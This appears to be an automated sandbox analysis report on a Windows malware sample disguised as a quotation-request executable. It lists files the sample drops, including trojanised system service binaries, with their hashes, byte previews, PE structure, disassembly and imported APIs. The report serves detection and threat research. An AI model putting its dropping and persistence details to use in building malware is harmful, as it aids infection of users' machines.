Preview:	...4:38AJSLA..59.UNZJ3IP.4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359.UNZD,.^A.0...O..`.[\Jf%<5-A(=aWX]V.:s.$qA@Wf< z.\|.p,[]V.LCYhAQ359FU7[C.t0&..S_.s3+.K...\|5).P..}T^."..p!6.gP%=s:-.IPA4938A..LA.249..k.J3IPA493.ALRG@Z35oBUNZJ3IPA49&8ANCLAQC19FU.ZJ#IPA693>ANSLAQ339FUNZJ3I E4918ANSLAS3u.FU^ZJ#IPA4)38QNSLAQ3%9FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ3.M#-:ZJ3..E49#8AN.HAQ#59FUNZJ3IPA493.AN3LAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANS

C:\Users\user\AppData\Local\Temp\immortaliser

Download File

Process:	C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe
File Type:	data
Category:	dropped
Size (bytes):	288768
Entropy (8bit):	7.994271917855947
Encrypted:	true
SSDEEP:	6144:mntWSXlPqqOC/jw8jxCI0jIXLKNq2p7iwZbtdH6ItEZR2A:jS1PqqOC7w8jCjIXOY87iUvagYR5
MD5:	E718A5652D2AB4800966589D11B88460
SHA1:	10C93CAF35DD75589C1A703E0C41C23D93F0C4D8
SHA-256:	A3AC7B5CB62E86D7804C24A82CE97B7CBBFDA0E0A9B64C50845BCF3A14CDDD97
SHA-512:	2C164D375457E187968098AD5D61206E117B2EFC2E0655E6C79F5B7A2AD44C065E02AA18A1CC05D7B5F8945D9C22457F9078BDB90594F97133BA99F88B71105F
Malicious:	false
Preview:	...4:38AJSLA..59.UNZJ3IP.4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359.UNZD,.^A.0...O..`.[\Jf%<5-A(=aWX]V.:s.$qA@Wf< z.\|.p,[]V.LCYhAQ359FU7[C.t0&..S_.s3+.K...\|5).P..}T^."..p!6.gP%=s:-.IPA4938A..LA.249..k.J3IPA493.ALRG@Z35oBUNZJ3IPA49&8ANCLAQC19FU.ZJ#IPA693>ANSLAQ339FUNZJ3I E4918ANSLAS3u.FU^ZJ#IPA4)38QNSLAQ3%9FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ3.M#-:ZJ3..E49#8AN.HAQ#59FUNZJ3IPA493.AN3LAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANS

C:\Users\user\AppData\Roaming\902dfe32f8c88b11.bin

Download File

Process:	C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe
File Type:	data
Category:	dropped
Size (bytes):	12320
Entropy (8bit):	7.98625208351619
Encrypted:	false
SSDEEP:	384:veEsXsiRJQzHDP/+SNDImL2Dkp/EiartcW:GnXsEKzjX+cDIm6Dkp8j
MD5:	55ECCEBBF76C050380FB39DA4B034385
SHA1:	08A8D343F0C54D687EA42AF6E76157A32542B2D3
SHA-256:	AD4869AF752F3ACE1760F83184D1EFA57B97F88EA84895C7895C2AE72A663F92
SHA-512:	F0E1E8D920D48263B236793D85DEBBC43753F68286FD2600478C579B2FD021EFABEACD74974494FC2E22F89E01EA68A1327D634317E0F5D3EDC1E78851FEA9C2
Malicious:	false
Preview:	...4."..4;.....u..m.b.5.+.$.Z..G?....N..$...IK......_>.y7..8......J....q[.z...H.$.[...L.... ...$..E......}....N@.i..;...^.....E"\|.........7.U._..c...u_(\.Y.......M2...[...z.....D...0.n.{.qs..\N.{.I...l...>.O....C_?n.=...\|.}.>>....{..k`]./.G.o.Z(\|..%......m6.u.e....P_NQ...Odg...R..Z.Z+a.....Na..CkRs..R.Rlp8....P5......m...y...5!..g\o3..x...R..._..H?/.p+."..q H.&M..........k.7..K.....).~.\|.4.....4.W.>!j_.\I._:.A..uS7r..G..[..>...a.3..A...F...W...+.\m...Y.`.2....o......p.-.6.gL.....^.....t..3.Z..<.A.\|3.j.t,%1..s.......@.Z.A.xP.b...Y.....w....."S......`....w.sle.v.Q-..u.i.......T1p.{.Ox.N.X.p..B..+.L.!..M:vmX.R..D.4N.e......%7t...i..?...Pf.../...EB..+s..\|... L.N>.u.\|v.)0..1..5...../zO,.>....Y...[.p..N....c...Q..T....0N.x..a0.[....6...X{...Q.=.........<....`.8...+.!+...{.%.C.OF....:....z.J.W.[...+&.GE+.N.W6...BL.Q..?G\.uc....A@.5.69w(.^..{5.{\.d...&H7._..,?"...8.8......jZ....K..R..~..9<h.xM.....Yf...y...#M...$.... .!..2..(...#.;.......

C:\Windows\System32\AppVClient.exe

Download File

Process:	C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1348608
Entropy (8bit):	7.251542914652518
Encrypted:	false
SSDEEP:	24576:QQW4qoNUgslKNX0Ip0MgHCpoMBOubVg9N9JMlDlfjRiVuVsWt5MJMs:QQW9BKNX0IPgiKMBOuJgFIDRRAubt5M
MD5:	1D7D22CFCA51F1A73A539A64CC53B616
SHA1:	ED42E65503FA7243C0EA7F6A7FA74F0CC9C6737B
SHA-256:	FE45D3DBCC2F1D042BB84519F159BF085379433ECCE19A6D562B08E104988488
SHA-512:	846FC1C10D91F312FDA6A3080322D495292E0B8B5A4A024590166000B1BAB3CCCA91A5CE17E27A026A30DAB211D19D711ED5C5BCB3244E82F6E0E89DFE8ABF70
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@.....................................".... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

Download File

Process:	C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1592832
Entropy (8bit):	4.174818790769991
Encrypted:	false
SSDEEP:	24576:k2G7AbHjkAVg9N9JMlDlfjRiVuVsWt5MJMs:k2G7AbHjrgFIDRRAubt5M
MD5:	92997EC0D2672677B7893749429C7111
SHA1:	CAB50489B60AEA61E2E5FFC00177E87A51EA4D34
SHA-256:	A47B8CD6128EF73B1D93E8D88860BCEE867DB381FE01C253ACEE9A77C3C25315
SHA-512:	94E797678E46EADF1AD6FFEFB19D52630591B9F9179296D1D3F62391D3DF9ABA0A2BD5562B9F331D91F94CA03B45575A680FEEFF7D3F823126315E58A9B4246B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@....................................Cx.... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...............n..............@...........................................................................................................................................................................................................................................................

C:\Windows\System32\FXSSVC.exe

Download File

Process:	C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1242624
Entropy (8bit):	7.28765654963366
Encrypted:	false
SSDEEP:	24576:+kdpSI+K3S/GWei+qNv2wG3YVg9N9JMlDlfjRiVuVsWt5MJMs:+6SIGGWei2wG3ogFIDRRAubt5M
MD5:	2F8DCF43C75A2511D20EB9E59E43AB07
SHA1:	4E3440A5EE7AFA493F3931D0C1370641DF0E2AFF
SHA-256:	A4626C24299F0C0FD86E5B13321F33494777398FF6043869B975EB14925934F1
SHA-512:	12A99984B460E8F8ABB67F9A4884BE718D6351E7DEC8A86CACAD6AFB6B0172B83571CD72C627B22888F7F18AD6FCD6AA531FA88DD63A3F7619431E18D2C57BFA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...\|..}x...y..}x..}y.x\|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P............ ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................

C:\Windows\System32\alg.exe

Download File

Process:	C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1594368
Entropy (8bit):	4.17567675365005
Encrypted:	false
SSDEEP:	12288:EEP3RFDV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMsU:/FpVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:	5DBFDD947810E81DAFCE72FA7C481167
SHA1:	5A17D822C73A65F08A2F2751B3E35DBBEE1158DC
SHA-256:	5E4B38C964F07E6D72B4AA56C4EB39DA7C04CDCC8BF149231E18835E1AEA495D
SHA-512:	9ED10EF1F18601AD8120F011E7800870348CD6DACCA4B9E9126D47C9290D095D80C5F45C953544D3C0A6E5FBAD4A52B96CD7BB931FDF3FA0CCCBD034F19D0599
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@.......................................... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...............t..............@...................................................................................................................................................................................................................................

C:\Windows\System32\config\systemprofile\AppData\Roaming\902dfe32f8c88b11.bin

Download File

Process:	C:\Windows\System32\AppVClient.exe
File Type:	data
Category:	dropped
Size (bytes):	12320
Entropy (8bit):	7.987595520707335
Encrypted:	false
SSDEEP:	192:e4nBJR6vB/3UHEpBknaoqhiU9A5uvXjd2FrlgEBTFIN824l8TwmflFA:n6CHeBauh45uvX+e4+xflq
MD5:	FB21C64B2AEFCAF4E619655EC791D270
SHA1:	F21E2721B2EFF6C4B8155AC752FE9ACC870798D6
SHA-256:	9CBE841CFDFB5AD6C2B36263A10400431B3BAC898CCB35D8142F3BFC1A1B18BA
SHA-512:	82A366641DD3640F4AF1D6163D6D303607C653388EE316E2F52BE84B8D963BC9B99D796386C2184A0CBED318B51425A49A855EB07705A0035C2A100B07203323
Malicious:	false
Preview:	.q...W.....v.#b...l6u..Z.!.'p.....1.".P@....7W8.s+..+.\.\.....\|...n...V..O.v....Jc.~..xR.9..-...9.....M.;....]O.G.uI..`.Ho....c.b...K..f..TE~.-}.+.}.[.!9..S^.:q.4....P.;....].^G....F.i.(.......Fw.Z.......#q......>......]..n.Ap.....'U.>.1..J.0...,.d;n."...c.0..~...h.XH...W..5.ms.PS......j.\|........:.O..F..q.q(.......U..<:z9....7'cr...U.h..H...<..... .......yD.&..g..J....b..]...A.,CdHv.".ff.....G.H.@.....XBBa.F<.Ha.(Y.4L.MF..4....K.t.jt..O..L..G)..P.....-....v..H.C.....(,l..Z....Gg].6$....2."\..v.Qkz"._.._B.i..K.qe.s..j^...0...6'......\|t........D~2...k.R.u..T."k:.Z...x.ylQ........7."q..P...8.qx.)~.g.....y.j..Z...K.~.............'.qz5.#..0.P...h?.;.j.o.6.of...5.5.....D...{.B.......)p..G.../.P0.Js.i..n..3.......m._$......W.`.....Y?R..K..h[.\|......6.a.@].....st.o.m..R~.OX.^m..^...{ ....."..-j.....;....6........?.j.....KI...u...F.A..U.i....7.......V{.=.Y...0b.[.....{.U.z...Ifq.KvE)..[.%._.....xY.......4&..P"....M7w......M.m..#.......

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.522076483270038
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	RFQ _ Virtue 054451000085.exe
File size:	1'801'728 bytes
MD5:	dd6599c8b0d09a38d88ef2c1e1720a6c
SHA1:	d538a849b763558e1577817593d00691e382b81a
SHA256:	ed0b66043d5223c79f2206468bd12d369d933e0db2234508702ce7402579835f
SHA512:	b50df5fce041b17b52ea6e3992ca36d8e3658c95aca90425568655b7e1188c01d7151cee08d62addf77fe9a62ed046fa710be8c18c10b00d1ccd6f40ee6eb55a
SSDEEP:	49152:dW0c++OCvkGs9FaUM2jPxFHwMzFJYSgFIDRRAubt5M:8B3vkJ9a27xqMrOUf
TLSH:	9585E02273DDC371CB679173FF2AB7056EBB38610630B85B2F940D79A960162162D7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x6752E481 [Fri Dec 6 11:48:17 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007FE520866C0Ah
jmp 00007FE5208599D4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FE520859B5Ah
cmp edi, eax
jc 00007FE520859EBEh
bt dword ptr [004C31FCh], 01h
jnc 00007FE520859B59h
rep movsb
jmp 00007FE520859E6Ch
cmp ecx, 00000080h
jc 00007FE520859D24h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FE520859B60h
bt dword ptr [004BE324h], 01h
jc 00007FE52085A030h
bt dword ptr [004C31FCh], 00000000h
jnc 00007FE520859CFDh
test edi, 00000003h
jne 00007FE520859D0Eh
test esi, 00000003h
jne 00007FE520859CEDh
bt edi, 02h
jnc 00007FE520859B5Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FE520859B63h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FE520859BB5h
bt esi, 03h
jnc 00007FE520859C08h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x616ac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	fa73b15dfd2617ec81babd6c86443ff5	False	0.5728679102422908	data	6.676132368411128	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x616ac	0x61800	1b341c6216e24eef35b5e07572bf8bd1	False	0.9323843149038461	data	7.90450734705553	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x129000	0x96000	0x95000	b390cfb4df4950a7f61360b7cd685f40	False	0.97575470585151	data	7.938034859964451	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x58973	data			1.0003334555084922
RT_GROUP_ICON	0x12812c	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x1281a4	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x1281b8	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x1281cc	0x14	data	English	Great Britain	1.25
RT_VERSION	0x1281e0	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x1282bc	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, 